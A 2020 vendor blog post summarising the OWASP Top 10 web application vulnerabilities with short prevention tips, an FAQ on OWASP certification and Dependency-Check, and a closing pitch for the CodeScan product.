What You Need to Know About OWASP’s Top 10 Vulnerabilities List
By Stephen Lockard | February 9, 2020
What Is OWASP?
OWASP stands for the Open Web Application Security Project, a non-profit, online community with the mission to make web applications more secure. This open-source community offers free articles, methodologies, tools, documentation, and technologies easily accessible to all. If you are a developer, you have come across the OWASP top 10 list of vulnerabilities. This is a set of common, most critical security vulnerabilities that organizations face when coding, configuring, and releasing products.
Top 10 OWASP Vulnerabilities
Make sure your organization is secure! Below is the official list of OWASP’s top 10 vulnerabilities and everything you need to know.
A code injection occurs when an attacker sends invalid data to a web application. One of the most common injection flaws is SQL injection, which occurs when untrusted data is sent to an interpreter while constructing a vulnerable SQL call. To avoid a code injection, make sure to review the source code to limit data exposure and prevent injection attacks.
2) Broken Authentication
Improper implementation of authentication functions and session management often leads to attacks on user identity, keys, passwords, and session tokens. To ensure that you are following website security best practices, be sure to perform external security audits before deploying the code to production.
3) Sensitive Data Exposure
Sensitive data exposure occurs when web applications and APIs fail to protect sensitive data, such as credit card numbers, social security numbers, personal information, or medical information. This can be prevented by identifying sensitive data according to privacy laws and applying controls per classification. Data encryption can be enforced with HSTS – HTTP Strict Transport Security.
4) XML External Entities (XXE)
An attack on XML External Entity occurs when web applications allow untrusted sources to perform XML uploads. Attackers take advantage of these applications on order to obtain internal files. Using fewer complex data formats, such as JSON, and disabling XML external entities can help developers avoid data breaches on sensitive information. Additionally, it is advised to use the SOAP 1.2 (or higher) dependency checker to help secure your projects.
5) Broken Access Control
Under broken access control, an attacker can access user accounts and operate as a user or admin in the system. The attacker can view sensitive files, change access rights, or modify other users’ data. Penetration testing can be used to detect unintended access controls. Additionally, to reduce the ability of an attacker to access your controls, remove unused accounts and apply a multi-factor authentication to all the access points.
6) Security Misconfigurations
Security misconfigurations are among the most common issues that occur in web application development. This is caused by default or incomplete configurations, unused pages, misconfigured HTTP readers, unprotected directories, and open cloud storage. To avoid security misconfiguration on all the applications, operating systems, libraries, and frameworks a security configuration and upgrade should be performed regularly.
7) Cross Site Scripting (XSS)
Cross site scripting is a common vulnerability that is found in about two-thirds of all web applications. It occurs when a web application contains untrusted data on a webpage, which enables attackers to inject client-side scripts into that webpage, steal user sessions, or redirect users to malicious sites. Use the latest frameworks, such as React JS and Ruby on Rails, to apply context-sensitive encoding. Additionally, it is important to modify browser documentation on the client-side to prevent XSS vulnerabilities.
8) Insecure Deserialization
Under the insecure deserialization vulnerability, attackers take advantage of deserialization flaws to remotely execute code into the system and perform various attacks such as injection attacks, replay attacks, and privilege escalation attacks. This compromises the whole application. To protect your application from this vulnerability, do not accept serialized objects from untrusted sources.
9) Using Components with Known Vulnerabilities
Components such as libraries and frameworks have the same privileges as the application itself. These components may contain known vulnerabilities. According to a report by Sucuri, 56% of all CMS applications were not updated in 2019. Attackers and cyber criminals are quick to take advantage of out-of-date software on web application, such as data attacks and server takeover. It is important to remove all the unnecessary application dependencies and use virtual patching.
10) Insufficient Logging and Monitoring
The lack of logging and monitoring of your web application on a regular basis gives the opportunity for attackers to perform compromising activities. Website logging and monitoring should be performed frequently to ensure that it remains secure. In the event, the website is compromised, immediate action can be taken to update the security. By performing penetration testing and studying the test logs, you can identify vulnerabilities easily, in real-time.
What is OWASP?
OWASP is a non-profit group focused on improving the security of web applications, and helping companies develop and maintain applications and security. OWASP offers a free knowledge base of application security information and software tools. The mission of the organization is to make software security accessible so that individuals and companies can make informed decisions.
What are the OWASP 10 Threats?
Here is the current list of OWASP Top 10 threats which are being used by application developers and security teams:
- Broken authentication
- Sensitive data exposure
- XML external entities (XXE)
- Broken access control
- Security misconfigurations
- Cross-site scripting (XSS)
- Insecure Deserialization
- Using Components with Known Vulnerabilities
- Insufficient Logging and Monitoring
How can I apply for OWASP Certification?
You cannot apply for an OWASP certification because it is not available yet. Though it has been discussed in the OWASP organization, currently there is no formal certification available. However, there are some cybersecurity websites who offer training programs on OWASP’s top 10 vulnerabilities and how to mitigate them across industries.
How do we test against the OWASP?
Like any other bugs, detecting if you have security vulnerabilities requires early testing so you can identify the most common security issues and eliminate them. To test your code against OWASP’s top 10 vulnerabilities, you can follow these steps:
- Create test environment for your project so you can assess its level of security.
- Identify all entry points where your data can be breached.
- Analyze how your code reacts to a potential data breach and what changes you may see if there is an attack.
- Understand and determine how to change your code so your project will not be exploited by attackers.
What is the OWASP Dependency-Check?
OWASP Dependency-Check is an open-source Software Composition Analysis (SCA) tool for developers to identify any known, publicly disclosed vulnerabilities within a project’s dependencies. The OWASP Dependency-Check supports five different programming languages, including Java, .Net, Python, Ruby, and Node.js. Dependency-Check works by determining if there is a Common Platform Enumeration (CPE) identifier for a given dependency. If so, it will generate a report which links to the associated Common Vulnerability and Exposure (CVE) entries.
How does CodeScan solutions work with OWASP?
When running a project in the CodeScan system, CodeScan automatically tests your code according to OWASP’s top 10 vulnerabilities, along with CWE and SANS. This security report provides you possible vulnerable areas in your code. You can see both vulnerabilities and security hotspots, and where they exist in your code.